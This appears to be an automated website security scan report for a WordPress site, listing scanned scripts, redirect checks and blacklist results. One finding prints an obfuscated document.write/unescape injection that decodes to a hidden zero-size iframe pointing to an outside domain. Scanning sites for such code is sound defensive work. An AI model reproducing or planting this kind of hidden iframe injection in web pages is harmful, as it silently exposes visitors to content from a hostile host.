Scanned pages/files
Request | Server response | Status |
http://rustmedia.tv/ | 200 OK Content-Length: 75660 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%65%6D%6F%73%2E%6D%6C%2F%3F%31%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%61%6C%69%67%6E%3D%22%6C%65%66%74%22%3E%3C%2F%69%66%72%61%6D%65%3E')); Decoded script: <iframe src="http://bemos.ml/?1" width="0" height="0" align="left"></iframe> | ||
http://rustmedia.tv/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/themes/moesia/js/waypoints.min.js?ver=1 | 200 OK Content-Length: 8044 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/themes/moesia/js/jquery.nicescroll.min.js?ver=1 | 200 OK Content-Length: 57983 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/themes/moesia/js/nicescroll-init.js?ver=1 | 200 OK Content-Length: 234 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/themes/moesia/js/wow.min.js?ver=1 | 200 OK Content-Length: 7057 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/themes/moesia/js/wow-init.js?ver=1 | 200 OK Content-Length: 62 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/themes/moesia/js/jquery.sticky.js?ver=1 | 200 OK Content-Length: 5699 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/themes/moesia/js/scripts.js?ver=1 | 200 OK Content-Length: 3385 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/themes/moesia/js/jquery.fitvids.js?ver=1 | 200 OK Content-Length: 2698 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/plugins/jetpack/modules/shortcodes/js/jquery.cycle.js?ver=2.9999.8 | 200 OK Content-Length: 52470 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/plugins/jetpack/modules/shortcodes/js/slideshow-shortcode.js?ver=20121214.1 | 200 OK Content-Length: 6057 Content-Type: application/javascript | clean |
http://rustmedia.tv/wp-content/plugins/custom-facebook-feed/js/cff-scripts.js?ver=2.3.1 | 200 OK Content-Length: 3765 Content-Type: application/javascript | clean |
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201510 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rustmedia.tv
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 04 Mar 2015 16:49:01 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Length: 75660
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://wp.me/BkYT>; rel=shortlink
Set-Cookie: PHPSESSID=vbdcXbODFL4EK6VoPDgqQ0; path=/
X-Pingback: http://rustmedia.tv/xmlrpc.php
...75660 bytes of data.
GET / HTTP/1.1
Host: rustmedia.tv
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 04 Mar 2015 16:49:01 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Length: 75660
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://wp.me/BkYT>; rel=shortlink
Set-Cookie: PHPSESSID=vbdcXbODFL4EK6VoPDgqQ0; path=/
X-Pingback: http://rustmedia.tv/xmlrpc.php
...75660 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rustmedia.tv
Referer: http://www.google.com/search?q=rustmedia.tv
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rustmedia.tv
Referer: http://www.google.com/search?q=rustmedia.tv
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rustmedia.tv
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://rustmedia.tv/
Result: rustmedia.tv is not infected or malware details are not published yet.
Result: rustmedia.tv is not infected or malware details are not published yet.